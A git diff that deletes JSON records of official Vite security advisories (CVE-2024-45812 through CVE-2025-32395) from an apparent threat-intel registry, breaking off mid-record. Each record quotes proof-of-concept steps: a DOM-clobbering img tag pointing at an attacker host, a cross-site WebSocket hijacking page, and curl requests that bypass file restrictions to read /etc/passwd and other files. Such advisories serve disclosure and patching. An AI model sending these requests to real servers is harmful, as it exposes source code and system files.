`'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`\n  ),\n  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),\n  // NOTE: make sure rollup generate `module` params\n  system: (relativePath) => getResolveUrl(\n    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`\n  ),\n  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(\n    relativePath\n  )} : ${getRelativeUrlFromDocument(relativePath, true)})`\n};\n```\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. \n\n```\n// main.js\nimport extraURL from './extra.js?url'\nvar s = document.createElement('script')\ns.src = extraURL\ndocument.head.append(s)\n```\n\n```\n// extra.js\nexport default \"https://myserver/justAnOther.js\"\n```\n\n```\n// vite.config.js\nimport { defineConfig } from 'vite'\n\nexport default defineConfig({\n  build: {\n    assetsInlineLimit: 0, // To avoid inline assets for PoC\n    rollupOptions: {\n      output: {\n        format: \"cjs\"\n      },\n    },\n  },\n  base: \"./\",\n});\n```\n\nAfter running the build command, the developer will get following bundle as the output.\n\n```\n// dist/index-DDmIg9VD.js\n\"use strict\";const t=\"\"+(typeof document>\"u\"?require(\"url\").pathToFileURL(__dirname+\"/extra-BLVEx9Lb.js\").href:new URL(\"extra-BLVEx9Lb.js\",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement(\"script\");e.src=t;document.head.append(e);\n```\n\nAdding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n  <title>Vite Example</title>\n  <!-- Attacker-controlled Script-less HTML Element starts--!>\n  <img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n  <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script type=\"module\" crossorigin src=\"/assets/index-DDmIg9VD.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.\n\n### Patch\n\n```\n// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =>\n  getResolveUrl(\n    `'${escapeId(partialEncodeURIPath(relativePath))}', ${\n      umd ? `typeof document === 'undefined' ? location.href : ` : ''\n    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,\n  )\n```",
-  "published_at": "2024-09-17T19:28:01Z",
-  "updated_at": "2026-02-04T04:04:22.977459Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3",
-  "secondary_source_urls": [
-    "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
-    "https://nvd.nist.gov/vuln/detail/CVE-2024-45812",
-    "https://github.com/vitejs/vite/commit/179b17773cf35c73ddb041f9e6c703fd9f3126af",
-    "https://github.com/vitejs/vite/commit/2691bb3ff6b073b41fb9046909e1e03a74e36675",
-    "https://github.com/vitejs/vite/commit/2ddd8541ec3b2d2e5b698749e0f2362ef28056bd",
-    "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad",
-    "https://github.com/vitejs/vite/commit/e8127166979e7ace6eeaa2c3b733c8994caa31f3",
-    "https://github.com/vitejs/vite/commit/ebb94c5b3bf41950f45562595adec117a4d0ba5e",
-    "https://github.com/vitejs/vite",
-    "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
-    "https://scnps.co/papers/sp23_domclob.pdf"
-  ],
-  "aliases": [
-    "CVE-2024-45812",
-    "GHSA-64vr-g452-qvp3"
-  ],
-  "cve_ids": [
-    "CVE-2024-45812"
-  ],
-  "ghsa_ids": [
-    "GHSA-64vr-g452-qvp3"
-  ],
-  "osv_ids": [
-    "GHSA-64vr-g452-qvp3"
-  ],
-  "affected_versions": [
-    "introduced=5.4.0, fixed<5.4.6",
-    "introduced=5.3.0, fixed<5.3.6",
-    "introduced=5.2.0, fixed<5.2.14",
-    "introduced=4.0.0, fixed<4.5.4",
-    "introduced=0, fixed<3.2.11",
-    "introduced=5.0.0, fixed<5.1.8"
-  ],
-  "fixed_versions": [
-    "5.4.6",
-    "5.3.6",
-    "5.2.14",
-    "4.5.4",
-    "3.2.11",
-    "5.1.8"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary",
-    "xss-output-encoding",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "xss-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json b/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json
deleted file mode 100644
index f445ad0e..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json
+++ /dev/null
@@ -1,78 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-24010",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Websites were able to send any requests to the development server and read the response in vite",
-  "summary": "### Summary\nVite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.\n\n> [!WARNING]\n> This vulnerability even applies to users that only run the Vite dev server on the local machine and does not expose the dev server to the network.\n\n### Upgrade Path\nUsers that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.\n\n- Using the backend integration feature\n- Using a reverse proxy in front of Vite\n- Accessing the development server via a domain other than `localhost` or `*.localhost`\n- Using a plugin / framework that connects to the WebSocket server on their own from the browser\n\n#### Using the backend integration feature\nIf you are using the backend integration feature and not setting [`server.origin`](https://vite.dev/config/server-options.html#server-origin), you need to add the origin of the backend server to the [`server.cors.origin`](https://github.com/expressjs/cors#configuration-options) option. Make sure to set a specific origin rather than `*`, otherwise any origin can access your development server.\n\n#### Using a reverse proxy in front of Vite\nIf you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than `localhost` or `*.localhost`, you need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if the reverse proxy is sending requests to `http://vite:5173`, you need to add `vite` to the `server.allowedHosts` option.\n\n#### Accessing the development server via a domain other than `localhost` or `*.localhost`\nYou need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if you are accessing the development server via `http://foo.example.com:8080`, you need to add `foo.example.com` to the `server.allowedHosts` option.\n\n#### Using a plugin / framework that connects to the WebSocket server on their own from the browser\nIf you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.\n\nIn that case, you can either:\n\n- fix the plugin / framework code to the make it compatible with the new version of Vite\n- set `legacy.skipWebSocketTokenCheck: true` to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite\n  - When enabling this option, **make sure that you are aware of the security implications** described in the impact section of [2] above.\n\n### Mitigation without upgrading Vite\n#### [1]: Permissive default CORS settings\nSet `server.cors` to `false` or limit `server.cors.origin` to trusted origins.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nThere aren't any mitigations for this.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUse Chrome 94+ or use HTTPS for the development server.\n\n### Details\n\nThere are three causes that allowed malicious websites to send any requests to the development server:\n\n#### [1]: Permissive default CORS settings\n\nVite sets the [`Access-Control-Allow-Origin`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin) header depending on [`server.cors`](https://vite.dev/config/server-options.html#server-cors) option. The default value was `true` which sets `Access-Control-Allow-Origin: *`. This allows websites on any origin to `fetch` contents served on the development server.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker sends a `fetch('http://127.0.0.1:5173/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n4. The attacker gets the content of `http://127.0.0.1:5173/main.js`.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n\nVite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server [did not perform validation on the Origin header](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/src/node/server/ws.ts#L145-L157) and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection ([list of the file paths that changed, the file content where the errored happened, etc.](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/types/hmrPayload.d.ts#L12-L72)), but plugins can send arbitrary messages and may include more sensitive information.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker runs `new WebSocket('http://127.0.0.1:5173', 'vite-hmr')` by JS in that malicious web page.\n4. The user edits some files.\n5. Vite sends some HMR messages over WebSocket.\n6. The attacker gets the content of the HMR messages.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\n\nUnless [`server.https`](https://vite.dev/config/server-options.html#server-https) is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.\n\n1. The attacker serves a malicious web page that is served on **HTTP** (`http://malicious.example.com:5173`) (HTTPS won't work).\n2. The user accesses the malicious web page.\n3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).\n4. The attacker sends a `fetch('/main.js')` request by JS in that malicious web page.\n5. The attacker gets the content of `http://127.0.0.1:5173/main.js` bypassing the same origin policy.\n\n### Impact\n#### [1]: Permissive default CORS settings\nUsers with the default `server.cors` option may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n  - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nAll users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.\n\nFor users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.\n\nFor users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUsers using HTTP for the development server and using a browser that is not Chrome 94+ may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n  - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\nChrome 94+ users are not affected for [3], because [sending a request to a private network page from public non-HTTPS page is forbidden](https://developer.chrome.com/blog/private-network-access-update#chrome_94) since Chrome 94.\n\n### Related Information\nSafari has [a bug that blocks requests to loopback addresses from HTTPS origins](https://bugs.webkit.org/show_bug.cgi?id=171934). This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of \"the malicious web page is served on HTTP\" to make [1] and [2] to work.\n\n### PoC\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n1. I used the `react` template which utilizes HMR functionality.\n\n```\nnpm create vite@latest my-vue-app-react -- --template react\n```\n\n2. Then on a malicious server, serve the following POC html:\n```html\n<!doctype html>\n<html lang=\"en\">\n    <head>\n        <meta charset=\"utf-8\" />\n        <title>vite CSWSH</title>\n    </head>\n    <body>\n        <div id=\"logs\"></div>\n        <script>\n            const div = document.querySelectorAll('#logs')[0];\n            const ws = new WebSocket('ws://localhost:5173','vite-hmr');\n            ws.onmessage = event => {\n                const logLine = document.createElement('p');\n                logLine.innerHTML = event.data;\n                div.append(logLine);\n            };\n        </script>\n    </body>\n</html>\n```\n\n3. Kick off Vite \n\n```\nnpm run dev\n```\n\n4. Load the development server (open `http://localhost:5173/`) as well as the malicious page in the browser. \n5. Edit `src/App.jsx` file and intentionally place a syntax error\n6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed\n\nHere's a video demonstrating the POC:\n\nhttps://github.com/user-attachments/assets/a4ad05cd-0b34-461c-9ff6-d7c8663d6961",
-  "published_at": "2025-01-21T19:52:55Z",
-  "updated_at": "2026-02-04T04:37:03.076966Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-24010",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2025-24010",
-    "GHSA-vg6x-rcgg-rjx6"
-  ],
-  "cve_ids": [
-    "CVE-2025-24010"
-  ],
-  "ghsa_ids": [
-    "GHSA-vg6x-rcgg-rjx6"
-  ],
-  "osv_ids": [
-    "GHSA-vg6x-rcgg-rjx6"
-  ],
-  "affected_versions": [
-    "introduced=6.0.0, fixed<6.0.9",
-    "introduced=5.0.0, fixed<5.4.12",
-    "introduced=0, fixed<4.5.6"
-  ],
-  "fixed_versions": [
-    "6.0.9",
-    "5.4.12",
-    "4.5.6"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary",
-    "dom-sink-hardening",
-    "token-cookie-storage",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "file-upload-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json b/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json
deleted file mode 100644
index ed28908a..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json
+++ /dev/null
@@ -1,84 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-30208",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite bypasses server.fs.deny when using ?raw??",
-  "summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n    <body>\n      <h1>403 Restricted</h1>\n      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
-  "published_at": "2025-03-25T14:00:02Z",
-  "updated_at": "2026-02-04T03:13:24.371631Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-30208",
-    "https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4",
-    "https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c",
-    "https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41",
-    "https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca",
-    "https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2025-30208",
-    "GHSA-x574-m823-4x7w"
-  ],
-  "cve_ids": [
-    "CVE-2025-30208"
-  ],
-  "ghsa_ids": [
-    "GHSA-x574-m823-4x7w"
-  ],
-  "osv_ids": [
-    "GHSA-x574-m823-4x7w"
-  ],
-  "affected_versions": [
-    "introduced=6.2.0, fixed<6.2.3",
-    "introduced=6.1.0, fixed<6.1.2",
-    "introduced=6.0.0, fixed<6.0.12",
-    "introduced=5.0.0, fixed<5.4.15",
-    "introduced=0, fixed<4.5.10"
-  ],
-  "fixed_versions": [
-    "6.2.3",
-    "6.1.2",
-    "6.0.12",
-    "5.4.15",
-    "4.5.10"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json b/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json
deleted file mode 100644
index bfbdb3ed..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json
+++ /dev/null
@@ -1,81 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-31125",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
-  "summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists.  Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
-  "published_at": "2025-03-31T17:31:54Z",
-  "updated_at": "2026-02-04T04:37:24.129476Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-31125",
-    "https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949",
-    "https://github.com/vitejs/vite",
-    "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125"
-  ],
-  "aliases": [
-    "CVE-2025-31125",
-    "GHSA-4r4m-qw57-chr8"
-  ],
-  "cve_ids": [
-    "CVE-2025-31125"
-  ],
-  "ghsa_ids": [
-    "GHSA-4r4m-qw57-chr8"
-  ],
-  "osv_ids": [
-    "GHSA-4r4m-qw57-chr8"
-  ],
-  "affected_versions": [
-    "introduced=6.2.0, fixed<6.2.4",
-    "introduced=6.1.0, fixed<6.1.3",
-    "introduced=6.0.0, fixed<6.0.13",
-    "introduced=5.0.0, fixed<5.4.16",
-    "introduced=0, fixed<4.5.11"
-  ],
-  "fixed_versions": [
-    "6.2.4",
-    "6.1.3",
-    "6.0.13",
-    "5.4.16",
-    "4.5.11"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json b/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json
deleted file mode 100644
index 28cd8aae..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json
+++ /dev/null
@@ -1,82 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-31486",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
-  "summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction was able to bypass.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
-  "published_at": "2025-04-04T14:20:05Z",
-  "updated_at": "2026-02-04T03:51:38.412061Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-31486",
-    "https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647",
-    "https://github.com/vitejs/vite",
-    "https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290"
-  ],
-  "aliases": [
-    "CVE-2025-31486",
-    "GHSA-xcj6-pq6g-qj4x"
-  ],
-  "cve_ids": [
-    "CVE-2025-31486"
-  ],
-  "ghsa_ids": [
-    "GHSA-xcj6-pq6g-qj4x"
-  ],
-  "osv_ids": [
-    "GHSA-xcj6-pq6g-qj4x"
-  ],
-  "affected_versions": [
-    "introduced=6.2.0, fixed<6.2.5",
-    "introduced=6.1.0, fixed<6.1.4",
-    "introduced=6.0.0, fixed<6.0.14",
-    "introduced=5.0.0, fixed<5.4.17",
-    "introduced=0, fixed<4.5.12"
-  ],
-  "fixed_versions": [
-    "6.2.5",
-    "6.1.4",
-    "6.0.14",
-    "5.4.17",
-    "4.5.12"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json b/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json
deleted file mode 100644
index b340e8c8..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json
+++ /dev/null
@@ -1,80 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-32395",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
-  "summary": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). Although an attacker can send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends to reject them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
-  "published_at": "2025-04-11T14:06:03Z",
-  "updated_at": "2026-02-04T04:11:44.900383Z",
-  "severity": "medium",
-  "cvss_score": 4.0,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-32395",
-    "https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2025-32395",
-    "GHSA-356w-63v5-8wf4"
-  ],
-  "cve_ids": [
-    "CVE-2025-32395"
-  ],
-  "ghsa_ids": [
-    "GHSA-356w-63v5-8wf4"
-  ],
-  "osv_ids": [
-    "GHSA-356w-63v5-8wf4"
-  ],
-  "affected_versions": [
-    "introduced=6.2.0, fixed<6.2.6",
-    "introduced=6.1.0, fixed<6.1.5",
-    "introduced=6.0.0, fixed<6.0.15",
-    "introduced=5.0.0, fixed<5.4.18",
-    "introduced=0, fixed<4.5.13"
-  ],
-  "fixed_versions": [
-    "6.2.6",
-    "6.1.5",
